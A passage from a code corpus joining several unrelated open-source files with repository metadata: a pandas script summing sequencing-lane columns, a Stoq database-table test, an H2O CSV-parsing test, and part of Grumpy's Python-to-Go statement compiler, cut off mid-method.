parser.print_help()
sys.exit('\natleast one argument required\n')
infile = args.infile
buffr = args.buffr
outfile = args.outfile
delim = args.delimiter
lanedelimit = args.lanedelimit
skiprows = int(args.skiprowsafterheader) # here skiprows is an int
if skiprows > 0: # here skiprows becomes a index based list
skiprows = range(1, 1+skiprows) # range(1,1+3) == [1, 2, 3], since with read_table the file is read with header as 0, so skip the next 3 lines, is index 1,2,3
# get the header line from the big file
header_line = ''
with open(infile, 'r') as f:
header_line = f.readline().strip()
#print header_line
# create a dict on the sample name and the different lanes to be summed
sample_lanes_dict = dict()
for entry in header_line.split(delim)[1:]: # here we are ignoring the header of the first column (e.g. ID, SampleID)
entry = entry.strip()
# split the entry with the lane delimiter and fill the dictionary
contents = entry.split(lanedelimit)
key = contents[0]
#print entry
if key in sample_lanes_dict:
sample_lanes_dict[key].append(entry)
else:
sample_lanes_dict[key] = [entry]
#print sample_lanes_dict
# sort the samples using the prefix and suffix of the buffr string
headers = sample_lanes_dict.keys()
if buffr != 'ignore':
headers = sort_headers(sample_lanes_dict.keys(), buffr)
# read the full file as a data frame
df = pd.read_table(infile, index_col = args.rowid, skiprows=skiprows, sep=delim)
print df.head()
### do not use this code below. use skiprows during read_table
# after reading the file, the header is not counted as a row. start skipping from row 1 (index 0)
#if(skiprows>0):i
# df = df.drop(df.index[[0,1,2,3,4]])
###
# create an empty df with the required row and column names
df_ = pd.DataFrame(index=list(df.index), columns=headers)
df_ = df_.fillna('NaN')
#print df_.head()
# sum the specific columns of the data frame
# https://stackoverflow.com/questions/25748683/pandas-sum-dataframe-rows-for-given-columns
for key in headers:
value = sample_lanes_dict[key]
print key, value
df_[key] = df[value].sum(axis=1)
print df_.head()
df_.to_csv(outfile, sep=delim, index_label=header_line.split(delim)[0])
# print the column names
print "Check the order of samples"
print '\n'.join(list(df_))
print "Done"
#sys.exit()
if __name__=='__main__':
datetime = strftime("%a, %d %b %Y %I:%M:%S %p", localtime())
cmd = 'echo ' + datetime
os.system(cmd)
main(sys.argv)
|
richrr/scripts
|
python/sum_data_from_lanes_per_sample.py
|
Python
|
gpl-3.0
| 5,060
|
[
"HTSeq"
] |
13b264fe01ad2f053142eb4bb2ccb031544b57129fdffcda886ec0e45498ffa5
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2013 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import itertools
import unittest
import mock
from stoqlib.database.orm import ORMObject
from stoqlib.database.tables import get_table_types, _tables_cache
from stoqlib.domain.plugin import InstalledPlugin
from stoqlib.domain.test.domaintest import DomainTest
from stoqlib.lib.introspection import get_all_classes
def _introspect_tables():
for klass in itertools.chain(get_all_classes('stoqlib/domain'),
get_all_classes('plugins')):
try:
if not issubclass(klass, ORMObject):
continue
except TypeError:
continue
if getattr(klass, '__storm_table__', 'invalid') == 'invalid':
continue
yield klass
class TableTypeTest(DomainTest):
@mock.patch('stoqlib.lib.pluginmanager.get_default_store')
def test(self, get_default_store):
# FIXME: get_table_types need plugins to be installed to get the
# plugin's tables. PluginManager.installed_plugins_names will use the
# default store to get the installed plugins, so mock it to the tests'
# store, create all the missing InstalledPlugin. Change this to a mock
# on installed_plugins_names when we can use newer versions of
# python-mock (which suports properly property mocking)
get_default_store.return_value = self.store
for p_name in self.get_oficial_plugins_names():
if self.store.find(InstalledPlugin, plugin_name=p_name).is_empty():
InstalledPlugin(store=self.store,
plugin_name=p_name, plugin_version=1)
# Depending on the order this test is runned, the cache will be
# already filled. Clear it so it imports again and get plugins too
_tables_cache.clear()
expected = set(t.__name__ for t in get_table_types())
introspected = set(t.__name__ for t in _introspect_tables())
# Tables in either expected or introspected but not both
difference = expected ^ introspected
if difference:
self.fail("Missing tables: %s\n"
"Please add them to stoqlib.database.tables or to the "
"plugin's get_tables" % (', '.join(sorted(difference), )))
if __name__ == '__main__':
unittest.main()
|
andrebellafronte/stoq
|
tests/test_tables.py
|
Python
|
gpl-2.0
| 3,219
|
[
"VisIt"
] |
1e932770888376be4c2b88fa6aeadf2dcc6dc265d71b542572c6ed7b5252b66e
|
import unittest, re, sys, random
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_hosts, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global localhost
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(node_count=1)
else:
h2o_hosts.build_cloud_with_hosts(node_count=1)
global SYNDATASETS_DIR
SYNDATASETS_DIR = h2o.make_syn_dir()
h2o.beta_features = True
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_A_many_parse1(self):
rows = self.genrows1()
set = 1
self.tryThemAll(set, rows, enumsOnly=False)
def test_B_many_parse2(self):
rows = self.genrows2()
set = 2
self.tryThemAll(set, rows, enumsOnly=True)
# this one has problems with blank lines
def test_C_many_parse3(self):
rows = self.genrows3()
set = 3
self.tryThemAll(set, rows, enumsOnly=True)
def genrows1(self):
# comment has to have # in first column? (no leading whitespace)
# FIX! what about blank fields and spaces as sep
# FIX! temporary need more lines to avoid sample error in H2O
# throw in some variants for leading 0 on the decimal, and scientific notation
# new: change the @ to an alternate legal SEP if the special HIVE SEP is in play
rows = [
# get rid of comments. We don't really support?
# "# 'comment, is okay",
# '# "this comment, is okay too',
# "# 'this' comment, is okay too",
# don't test comma's in the header. get rid of all secondary separator-like char here
# "@FirstName@|@Middle@Initials@|@LastName@|@Date@of@Birth@", # had to remove the trailing space to avoid bad parse
"FirstName|MiddleInitials|LastName|DateofBirth", # had to remove the trailing space to avoid bad parse
"0|0.5|1|0",
"3|NaN|4|1",
"6||8|0",
"0.6|0.7|0.8|1",
"+0.6|+0.7|+0.8|0",
"-0.6|-0.7|-0.8|1",
".6|.7|.8|0",
"+.6|+.7|+.8|1",
"-.6|-.7|-.8|0",
"+0.6e0|+0.7e0|+0.8e0|1",
"-0.6e0|-0.7e0|-0.8e0|0",
".6e0|.7e0|.8e0|1",
"+.6e0|+.7e0|+.8e0|0",
"-.6e0|-.7e0|-.8e0|1",
"+0.6e00|+0.7e00|+0.8e00|0",
"-0.6e00|-0.7e00|-0.8e00|1",
".6e00|.7e00|.8e00|0",
"+.6e00|+.7e00|+.8e00|1",
"-.6e00|-.7e00|-.8e00|0",
"+0.6e-01|+0.7e-01|+0.8e-01|1",
"-0.6e-01|-0.7e-01|-0.8e-01|0",
".6e-01|.7e-01|.8e-01|1",
"+.6e-01|+.7e-01|+.8e-01|0",
"-.6e-01|-.7e-01|-.8e-01|1",
"+0.6e+01|+0.7e+01|+0.8e+01|0",
"-0.6e+01|-0.7e+01|-0.8e+01|1",
".6e+01|.7e+01|.8e+01|0",
"+.6e+01|+.7e+01|+.8e+01|1",
"-.6e+01|-.7e+01|-.8e+01|0",
"+0.6e102|+0.7e102|+0.8e102|1",
"-0.6e102|-0.7e102|-0.8e102|0",
".6e102|.7e102|.8e102|1",
"+.6e102|+.7e102|+.8e102|0",
"-.6e102|-.7e102|-.8e102|1",
]
return rows
# "# comment here is okay",
# "# comment here is okay too",
# FIX! needed an extra line to avoid bug on default 67+ sample?
def genrows2(self):
rows = [
"First@Name|@MiddleInitials|LastName@|Date@ofBirth",
"Kalyn|A.|Dalton|1967-04-01",
"Gwendolyn|B.|Burton|1947-10-26",
"Elodia|G.|Ali|1983-10-31",
"Elo@dia|@G.|Ali@|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31"
]
return rows
# update spec
# intermixing blank lines in the first two lines breaks things
# blank lines cause all columns except the first to get NA (red)
# first may get a blank string? (not ignored)
def genrows3(self):
rows = [
"# comment here is okay",
"# comment here is okay too",
"FirstName|MiddleInitials|LastName|DateofBirth",
"Kalyn|A.|Dalton|1967-04-01",
"",
"Gwendolyn||Burton|1947-10-26",
"",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
"Elodia|G.|Ali|1983-10-31",
]
return rows
# The 3 supported line-ends
# FIX! should test them within quoted tokens
eolDict = {
0:"\n",
1:"\r\n",
2:"\r"
}
# tab here will cause problems too?
# 5:['"\t','\t"'],
# 8:["'\t","\t'"]
tokenChangeDict = {
0:['',''],
1:['\t','\t'],
1:['\t','\t'],
2:[' ',' '],
3:['"','"'],
4:['" ',' "'],
5:["'","'"],
6:["' "," '"],
}
# flip in more characters to confuse the separator decisions. for enum test data only
tokenChangeDictEnumsOnly = {
0:[' a\t','\ta '],
1:['\t a','a \t'],
2:['',''],
3:['\t','\t'],
4:[' ',' '],
5:['"','"'],
6:['" ',' "'],
7:["'","'"],
8:["' "," '"],
}
def changeTokens(self, rows, tokenCase, tokenChangeDict):
[cOpen,cClose] = tokenChangeDict[tokenCase]
newRows = []
for r in rows:
# don't quote lines that start with #
# can quote lines start with some spaces or tabs? maybe
comment = re.match(r'^[ \t]*#', r)
empty = re.match(r'^$',r)
if not (comment or empty):
r = re.sub('^',cOpen,r)
r = re.sub('\|',cClose + '|' + cOpen,r)
r = re.sub('$',cClose,r)
h2o.verboseprint(r)
newRows.append(r)
return newRows
def writeRows(self,csvPathname,rows,eol):
f = open(csvPathname, 'w')
for r in rows:
f.write(r + eol)
# what about case of missing eoll at end of file?
sepChangeDict = {
# NEW: 0x01 can be SEP character for Hive datasets
0:"",
1:",",
2:" ",
3:"\t",
}
def changeSep(self,rows,sepCase):
# do a trial replace, to see if we get a <tab><sp> problem
# comments at the beginning..get a good row
r = rows[-1]
tabseptab = re.search(r'\t|\t', r)
spsepsp = re.search(r' | ', r)
if tabseptab or spsepsp:
# use comma instead. always works
# print "Avoided"
newSep = ","
else:
newSep = self.sepChangeDict[sepCase]
newRows = [r.replace('|',newSep) for r in rows]
# special case, if using the HIVE sep, substitute randomly
# one of the other SEPs into the "@" in the template
# FIX! we need to add HIVE lineends into lineend choices.
# assuming that lineend
if newSep == "":
# don't use the same SEP to swap in.
randomOtherSep = random.choice(self.sepChangeDict.values())
while (randomOtherSep==newSep):
randomOtherSep = random.choice(self.sepChangeDict.values())
newRows = [r.replace('@',randomOtherSep) for r in newRows]
return newRows
def tryThemAll(self, set, rows, enumsOnly=False):
for eolCase in range(len(self.eolDict)):
eol = self.eolDict[eolCase]
# change tokens must be first
if enumsOnly:
tcd = self.tokenChangeDict
else:
tcd = self.tokenChangeDictEnumsOnly
for tokenCase in range(len(tcd)):
newRows1 = self.changeTokens(rows, tokenCase, tcd)
for sepCase in range(len(self.sepChangeDict)):
newRows2 = self.changeSep(newRows1,sepCase)
csvPathname = SYNDATASETS_DIR + '/parsetmp_' + \
str(set) + "_" + \
str(eolCase) + "_" + \
str(tokenCase) + "_" + \
str(sepCase) + \
'.data'
self.writeRows(csvPathname,newRows2,eol)
if "'" in tcd[tokenCase][0]:
single_quotes = 1
else:
single_quotes = 0
parseResult = h2i.import_parse(path=csvPathname, schema='put', single_quotes=single_quotes,
noPrint=not h2o.verbose)
h2o_cmd.runRF(parseResult=parseResult, trees=1,
timeoutSecs=10, retryDelaySecs=0.1, noPrint=True, print_params=True)
h2o.verboseprint("Set", set)
h2o.check_sandbox_for_errors()
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
h2o.unit_main()
|
woobe/h2o
|
py/testdir_single_jvm/test_parse_many_cases_fvec.py
|
Python
|
apache-2.0
| 9,060
|
[
"Dalton"
] |
c6ed6b6d9135a3f84a767b2feb6a7d278acf3d2a96c518c67163cb09605a462f
|
# coding=utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Visitor class for traversing Python statements."""
import ast
import string
import textwrap
from grumpy.compiler import block
from grumpy.compiler import expr
from grumpy.compiler import expr_visitor
from grumpy.compiler import util
_NATIVE_MODULE_PREFIX = '__go__.'
_NATIVE_TYPE_PREFIX = 'type_'
_nil_expr = expr.nil_expr
class StatementVisitor(ast.NodeVisitor):
"""Outputs Go statements to a Writer for the given Python nodes."""
# pylint: disable=invalid-name,missing-docstring
def __init__(self, block_):
self.block = block_
self.writer = util.Writer()
self.expr_visitor = expr_visitor.ExprVisitor(self.block, self.writer)
def generic_visit(self, node):
msg = 'node not yet implemented: {}'.format(type(node).__name__)
raise util.ParseError(node, msg)
def visit_Assert(self, node):
self._write_py_context(node.lineno)
# TODO: Only evaluate msg if cond is false.
with self.expr_visitor.visit(node.msg) if node.msg else _nil_expr as msg,\
self.expr_visitor.visit(node.test) as cond:
self.writer.write_checked_call1(
'πg.Assert(πF, {}, {})', cond.expr, msg.expr)
def visit_AugAssign(self, node):
op_type = type(node.op)
if op_type not in StatementVisitor._AUG_ASSIGN_TEMPLATES:
fmt = 'augmented assignment op not implemented: {}'
raise util.ParseError(node, fmt.format(op_type.__name__))
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.target) as target,\
self.expr_visitor.visit(node.value) as value,\
self.block.alloc_temp() as temp:
self.writer.write_checked_call2(
temp, StatementVisitor._AUG_ASSIGN_TEMPLATES[op_type],
lhs=target.expr, rhs=value.expr)
self._assign_target(node.target, temp.expr)
def visit_Assign(self, node):
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.value) as value:
for target in node.targets:
self._tie_target(target, value.expr)
def visit_Break(self, node):
self._write_py_context(node.lineno)
self.writer.write('goto Label{}'.format(self.block.top_loop().end_label))
def visit_ClassDef(self, node):
# Since we only care about global vars, we end up throwing away the locals
# collected by BlockVisitor. But use it anyway since it buys us detection of
# assignment to vars that are later declared global.
block_visitor = block.BlockVisitor()
for child in node.body:
block_visitor.visit(child)
global_vars = {v.name for v in block_visitor.vars.values()
if v.type == block.Var.TYPE_GLOBAL}
# Visit all the statements inside body of the class definition.
body_visitor = StatementVisitor(block.ClassBlock(
self.block, node.name, global_vars))
# Indent so that the function body is aligned with the goto labels.
with body_visitor.writer.indent_block():
body_visitor._visit_each(node.body) # pylint: disable=protected-access
self._write_py_context(node.lineno)
with self.block.alloc_temp('*πg.Dict') as cls, \
self.block.alloc_temp() as mod_name, \
self.block.alloc_temp('[]*πg.Object') as bases, \
self.block.alloc_temp() as meta:
self.writer.write('{} = make([]*πg.Object, {})'.format(
bases.expr, len(node.bases)))
for i, b in enumerate(node.bases):
with self.expr_visitor.visit(b) as b:
self.writer.write('{}[{}] = {}'.format(bases.expr, i, b.expr))
self.writer.write('{} = πg.NewDict()'.format(cls.name))
self.writer.write_checked_call2(
mod_name, 'πF.Globals().GetItem(πF, {}.ToObject())',
self.block.intern('__name__'))
self.writer.write_checked_call1(
'{}.SetItem(πF, {}.ToObject(), {})',
cls.expr, self.block.intern('__module__'), mod_name.expr)
tmpl = textwrap.dedent("""
_, πE = πg.NewCode($name, $filename, nil, 0, func(πF *πg.Frame, _ []*πg.Object) (*πg.Object, *πg.BaseException) {
\tπClass := $cls
\t_ = πClass""")
self.writer.write_tmpl(tmpl, name=util.go_str(node.name),
filename=util.go_str(self.block.filename),
cls=cls.expr)
with self.writer.indent_block():
self.writer.write_temp_decls(body_visitor.block)
self.writer.write_block(body_visitor.block,
body_visitor.writer.out.getvalue())
tmpl = textwrap.dedent("""\
}).Eval(πF, πF.Globals(), nil, nil)
if πE != nil {
\treturn nil, πE
}
if $meta, πE = $cls.GetItem(πF, $metaclass_str.ToObject()); πE != nil {
\treturn nil, πE
}
if $meta == nil {
\t$meta = πg.TypeType.ToObject()
}""")
self.writer.write_tmpl(tmpl, meta=meta.name, cls=cls.expr,
metaclass_str=self.block.intern('__metaclass__'))
with self.block.alloc_temp() as type_:
type_expr = ('{}.Call(πF, []*πg.Object{{πg.NewStr({}).ToObject(), '
'πg.NewTuple({}...).ToObject(), {}.ToObject()}}, nil)')
self.writer.write_checked_call2(
type_, type_expr, meta.expr,
util.go_str(node.name), bases.expr, cls.expr)
self.block.bind_var(self.writer, node.name, type_.expr)
def visit_Continue(self, node):
self._write_py_context(node.lineno)
self.writer.write('goto Label{}'.format(self.block.top_loop().start_label))
def visit_Delete(self, node):
self._write_py_context(node.lineno)
for target in node.targets:
if isinstance(target, ast.Attribute):
with self.expr_visitor.visit(target.value) as t:
self.writer.write_checked_call1(
'πg.DelAttr(πF, {}, {})', t.expr, self.block.intern(target.attr))
elif isinstance(target, ast.Name):
self.block.del_var(self.writer, target.id)
elif isinstance(target, ast.Subscript):
assert isinstance(target.ctx, ast.Del)
with self.expr_visitor.visit(target.value) as t,\
self.expr_visitor.visit(target.slice) as index:
self.writer.write_checked_call1('πg.DelItem(πF, {}, {})',
t.expr, index.expr)
else:
msg = 'del target not implemented: {}'.format(type(target).__name__)
raise util.ParseError(node, msg)
def visit_Expr(self, node):
self._write_py_context(node.lineno)
self.expr_visitor.visit(node.value).free()
def visit_For(self, node):
loop = self.block.push_loop()
orelse_label = self.block.genlabel() if node.orelse else loop.end_label
self._write_py_context(node.lineno)
with self.expr_visitor.visit(node.iter) as iter_expr, \
self.block.alloc_temp() as i, \
self.block.alloc_temp() as n:
self.writer.write_checked_call2(i, 'πg.Iter(πF, {})', iter_expr.expr)
self.writer.write_label(loop.start_label)
tmpl = textwrap.dedent("""\
if $n, πE = πg.Next(πF, $i); πE != nil {
\tisStop, exc := πg.IsInstance(πF, πE.ToObject(), πg.StopIterationType.ToObject())
\tif exc != nil {
\t\tπE = exc
\t\tcontinue
\t}
\tif !isStop {
\t\tcontinue
\t}
\tπE = nil
\tπF.RestoreExc(nil, nil)
\tgoto Label$orelse
}""")
self.writer.write_tmpl(tmpl, n=n.name, i=i.expr, orelse=orelse_label)
self._tie_target(node.target, n.expr)
self._visit_each(node.body)
self.writer.write('goto Label{}'.format(loop.start_label))
if node.orelse:
self.writer.write_label(orelse_label)
self._visit_each(node.orelse)
# Avoid label "defined and not used" in case there's no break statements.
self.writer.write('goto Label{}'.format(loop.end_label))
self.writer.write_label(loop.end_label)
self.block.pop_loop()
def visit_FunctionDef(self, node):
self._write_py_context(node.lineno)
func = self.expr_visitor.visit_function_inline(node)
self.block.bind_var(self.writer, node.name, func.expr)
def visit_Global(self, node):
self._write_py_context(node.lineno)
def visit_If(self, node):
# Collect the nodes for each if/elif/else body and write the dispatching
# switch statement.
bodies = []
# An elif clause is represented as a single If node within the orelse
# section of the previous If node. Thus this loop terminates once we are
# done all the elif clauses at which time the orelse var will contain the
# nodes (if any) for the else clause.
orelse = [node]
while len(orelse) == 1 and isinstance(orelse[0], ast.If):
ifnode = orelse[0]
with self.expr_visitor.visit(ifnode.test) as cond:
label = self.block.genlabel()
# We goto the body of the if statement instead of executing it inline
# because the body itself may be a goto target and Go does not support
# jumping to targets inside a block.
with self.block.alloc_temp('bool') as is_true:
self.writer.write_tmpl(textwrap.dedent("""\
if $is_true, πE = πg.IsTrue(πF, $cond); πE != nil {
\treturn nil, πE
}
if $is_true {
\tgoto Label$label
}"""), is_true=is_true.name, cond=cond.expr, label=label)
bodies.append((label, ifnode.body, ifnode.lineno))
orelse = ifnode.orelse
default_label = end_label = self.block.genlabel()
if orelse:
end_label = self.block.genlabel()
# The else is not represented by ast and thus there is no lineno.
bodies.append((default_label, orelse, None))
self.writer.write('goto Label{}'.format(default_label))
# Write the body of each clause.
for label, body, lineno in bodies:
if lineno:
self._write_py_context(lineno)
self.writer.write_label(label)
self._visit_each(body)
self.writer.write('goto Label{}'.format(end_label))
self.writer.write_label(end_label)
def visit_Import(self, node):
self._write_py_context(node.lineno)
for alias in node.names:
if alias.name.startswith(_NATIVE_MODULE_PREFIX):
raise util.ParseError(
node, 'for native imports use "from __go__.xyz import ..." syntax')
with self._import(alias.name, 0) as mod:
asname = alias.asname or alias.name.split('.')[0]
self.block.bind_var(self.writer, asname, mod.expr)
def visit_ImportFrom(self, node):
self._write_py_context(node.lineno)
if node.module.startswith(_NATIVE_MODULE_PREFIX):
values = [alias.name for alias in node.names]
with self._import_native(node.module, values) as mod:
for alias in node.names:
# Strip the 'type_' prefix when populating the module. This means
# that, e.g. 'from __go__.foo import type_Bar' will populate foo with
# a member called Bar, not type_Bar (although the symbol in the
# importing module will still be type_Bar unless aliased). This bends
# the semantics of import but makes native module contents more
# sensible.
name = alias.name
if name.startswith(_NATIVE_TYPE_PREFIX):
name = name[len(_NATIVE_TYPE_PREFIX):]
with self.block.alloc_temp() as member:
self.writer.write_checked_call2(
member, 'πg.GetAttr(πF, {}, {}, nil)',
mod.expr, self.block.intern(name))
self.block.bind_var(
self.writer, alias.asname or alias.name, member.expr)
else:
# NOTE: Assume that the names being imported are all modules within a
# package. E.g. "from a.b import c" is importing the module c from package
# a.b, not some member of module b. We cannot distinguish between these
# two cases at compile time and the Google style guide forbids the latter
# so we support that use case only.
for alias in node.names:
name = '{}.{}'.format(node.module, alias.name)
with self._import(name, name.count('.')) as mod:
asname = alias.asname or alias.name
self.block.bind_var(self.writer, asname, mod.expr)
def visit_Module(self, node):
self._visit_each(node.body)
def visit_Pass(self, node):
self._write_py_context(node.lineno)
def visit_Print(self, node):
self._write_py_context(node.lineno)
with self.block.alloc_temp('[]*πg.Object') as args:
self.writer.write('{} = make([]*πg.Object, {})'.format(
args.expr, len(node.values)))
for i, v in enumerate(node.values):
with self.expr_visitor.visit(v) as arg:
self.writer.write('{}[{}] = {}'.format(args.expr, i, arg.expr))
self.writer.write_checked_call1('πg.Print(πF, {}, {})', args.expr,
'true' if node.nl else 'false')
def visit_Raise(self, node):
with self.expr_visitor.visit(node.type) if node.type else _nil_expr as t,\
self.expr_visitor.visit(node.inst) if node.inst else _nil_expr as inst,\
self.expr_visitor.visit(node.tback) if node.tback else _nil_expr as tb:
if node.inst:
assert node.type, 'raise had inst but no type'
if node.tback:
assert node.inst, 'raise had tback but no inst'
self._write_py_context(node.lineno)
self.writer.write('πE = πF.Raise({}, {}, {})'.format(
t.expr, inst.expr, tb.expr))
self.writer.write('continue')
def visit_Return(self, node):
assert isinstance(self.block, block.FunctionBlock)
self._write_py_context(node.lineno)
if self.block.is_generator and node.value:
raise util.ParseError(node, 'returning a value in a generator function')
if node.value:
with self.expr_visitor.visit(node.value) as value:
self.writer.write('return {}, nil'.format(value.expr))
else:
self.writer.write('return nil, nil')
def visit_TryExcept(self, node): # pylint: disable=g-doc-args
# The general structure generated by this method is shown below:
#
# checkpoints.Push(Except)
# <try body>
# Checkpoints.Pop()
# <else body>
# goto Done
# Except:
# <dispatch table>
# Handler1:
# <handler 1 body>
# goto Done
# Handler2:
# <handler 2 body>
# goto Done
# ...
# Done:
#
# The dispatch table maps the current exception to the appropriate handler
# label according to the exception clauses.
# Write the try body.
self._write_py_context(node.lineno)
except_label = self.block.genlabel(is_checkpoint=True)
done_label = self.block.genlabel()
self.writer.write('πF.PushCheckpoint({})'.format(except_label))
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
if node.orelse:
self._visit_each(node.orelse)
self.writer.write('goto Label{}'.format(done_label))
with self.block.alloc_temp('*πg.BaseException') as exc:
if (len(node.handlers) == 1 and not node.handlers[0].type and
not node.orelse):
# When there's just a bare except, no dispatch is required.
self._write_except_block(except_label, exc.expr, node.handlers[0])
self.writer.write_label(done_label)
return
with self.block.alloc_temp('*πg.Traceback') as tb:
self.writer.write_label(except_label)
self.writer.write('{}, {} = πF.ExcInfo()'.format(exc.expr, tb.expr))
handler_labels = self._write_except_dispatcher(
exc.expr, tb.expr, node.handlers)
# Write the bodies of each of the except handlers.
for handler_label, except_node in zip(handler_labels, node.handlers):
self._write_except_block(handler_label, exc.expr, except_node)
self.writer.write('goto Label{}'.format(done_label))
self.writer.write_label(done_label)
def visit_TryFinally(self, node): # pylint: disable=g-doc-args
# The general structure generated by this method is shown below:
#
# Checkpoints.Push(Finally)
# <try body>
# Checkpoints.Pop()
# Finally:
# <finally body>
# Write the try body.
self._write_py_context(node.lineno)
finally_label = self.block.genlabel(is_checkpoint=True)
self.writer.write('πF.PushCheckpoint({})'.format(finally_label))
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
# Write the finally body.
with self.block.alloc_temp('*πg.BaseException') as exc,\
self.block.alloc_temp('*πg.Traceback') as tb:
self.writer.write_label(finally_label)
self.writer.write('πE = nil')
self.writer.write('{}, {} = πF.RestoreExc(nil, nil)'.format(
exc.expr, tb.expr))
self._visit_each(node.finalbody)
self.writer.write_tmpl(textwrap.dedent("""\
if $exc != nil {
\tπE = πF.Raise($exc.ToObject(), nil, $tb.ToObject())
\tcontinue
}"""), exc=exc.expr, tb=tb.expr)
def visit_While(self, node):
loop = self.block.push_loop()
self._write_py_context(node.lineno)
self.writer.write_label(loop.start_label)
orelse_label = self.block.genlabel() if node.orelse else loop.end_label
with self.expr_visitor.visit(node.test) as cond,\
self.block.alloc_temp('bool') as is_true:
self.writer.write_checked_call2(is_true, 'πg.IsTrue(πF, {})', cond.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if !$is_true {
\tgoto Label$orelse_label
}"""), is_true=is_true.expr, orelse_label=orelse_label)
self._visit_each(node.body)
self.writer.write('goto Label{}'.format(loop.start_label))
if node.orelse:
self.writer.write_label(orelse_label)
self._visit_each(node.orelse)
# Avoid label "defined and not used" in case there's no break statements.
self.writer.write('goto Label{}'.format(loop.end_label))
self.writer.write_label(loop.end_label)
self.block.pop_loop()
_AUG_ASSIGN_TEMPLATES = {
ast.Add: 'πg.IAdd(πF, {lhs}, {rhs})',
ast.BitAnd: 'πg.IAnd(πF, {lhs}, {rhs})',
ast.Div: 'πg.IDiv(πF, {lhs}, {rhs})',
ast.Mod: 'πg.IMod(πF, {lhs}, {rhs})',
ast.Mult: 'πg.IMul(πF, {lhs}, {rhs})',
ast.BitOr: 'πg.IOr(πF, {lhs}, {rhs})',
ast.Sub: 'πg.ISub(πF, {lhs}, {rhs})',
ast.BitXor: 'πg.IXor(πF, {lhs}, {rhs})',
}
def visit_With(self, node):
self._write_py_context(node.lineno)
# mgr := EXPR
with self.expr_visitor.visit(node.context_expr) as mgr,\
self.block.alloc_temp() as exit_func,\
self.block.alloc_temp() as value:
# The code here has a subtle twist: It gets the exit function attribute
# from the class, not from the object. This matches the pseudo code from
# PEP 343 exactly, and is very close to what CPython actually does. (The
# CPython implementation actually uses a special lookup which is performed
# on the object, but skips the instance dictionary: see ceval.c and
# lookup_maybe in typeobject.c.)
# exit := type(mgr).__exit__
self.writer.write_checked_call2(
exit_func, 'πg.GetAttr(πF, {}.Type().ToObject(), {}, nil)',
mgr.expr, self.block.intern('__exit__'))
# value := type(mgr).__enter__(mgr)
self.writer.write_checked_call2(
value, 'πg.GetAttr(πF, {}.Type().ToObject(), {}, nil)',
mgr.expr, self.block.intern('__enter__'))
self.writer.write_checked_call2(
value, '{}.Call(πF, πg.Args{{{}}}, nil)',
value.expr, mgr.expr)
finally_label = self.block.genlabel(is_checkpoint=True)
self.writer.write('πF.PushCheckpoint({})'.format(finally_label))
if node.optional_vars:
self._tie_target(node.optional_vars, value.expr)
self._visit_each(node.body)
self.writer.write('πF.PopCheckpoint()')
self.writer.write_label(finally_label)
with self.block.alloc_temp() as swallow_exc,\
self.block.alloc_temp('bool') as swallow_exc_bool,\
self.block.alloc_temp('*πg.BaseException') as exc,\
self.block.alloc_temp('*πg.Traceback') as tb,\
self.block.alloc_temp('*πg.Type') as t:
# temp := exit(mgr, *sys.exec_info())
tmpl = """\
$exc, $tb = πF.ExcInfo()
if $exc != nil {
\t$t = $exc.Type()
\tif $swallow_exc, πE = $exit_func.Call(πF, πg.Args{$mgr, $t.ToObject(), $exc.ToObject(), $tb.ToObject()}, nil); πE != nil {
\t\tcontinue
\t}
} else {
\tif $swallow_exc, πE = $exit_func.Call(πF, πg.Args{$mgr, πg.None, πg.None, πg.None}, nil); πE != nil {
\t\tcontinue
\t}
}
"""
self.writer.write_tmpl(
textwrap.dedent(tmpl), exc=exc.expr, tb=tb.expr, t=t.name,
mgr=mgr.expr, exit_func=exit_func.expr,
swallow_exc=swallow_exc.name)
# if Exc != nil && swallow_exc != true {
# Raise(nil, nil)
# }
self.writer.write_checked_call2(
swallow_exc_bool, 'πg.IsTrue(πF, {})', swallow_exc.expr)
self.writer.write_tmpl(textwrap.dedent("""\
if $exc != nil && $swallow_exc != true {
\tπE = πF.Raise(nil, nil, nil)
\tcontinue
}"""), exc=exc.expr, swallow_exc=swallow_exc_bool.expr)
def _assign_target(self, target, value):
if isinstance(target, ast.Name):
self.block.bind_var(self.writer, target.id, value)
elif isinstance(target, ast.Attribute):
assert isinstance(target.ctx, ast.Store)
with self.expr_visitor.visit(target.value) as obj:
self.writer.write_checked_call1(
'πg.SetAttr(πF, {}, {}, {})', obj.expr,
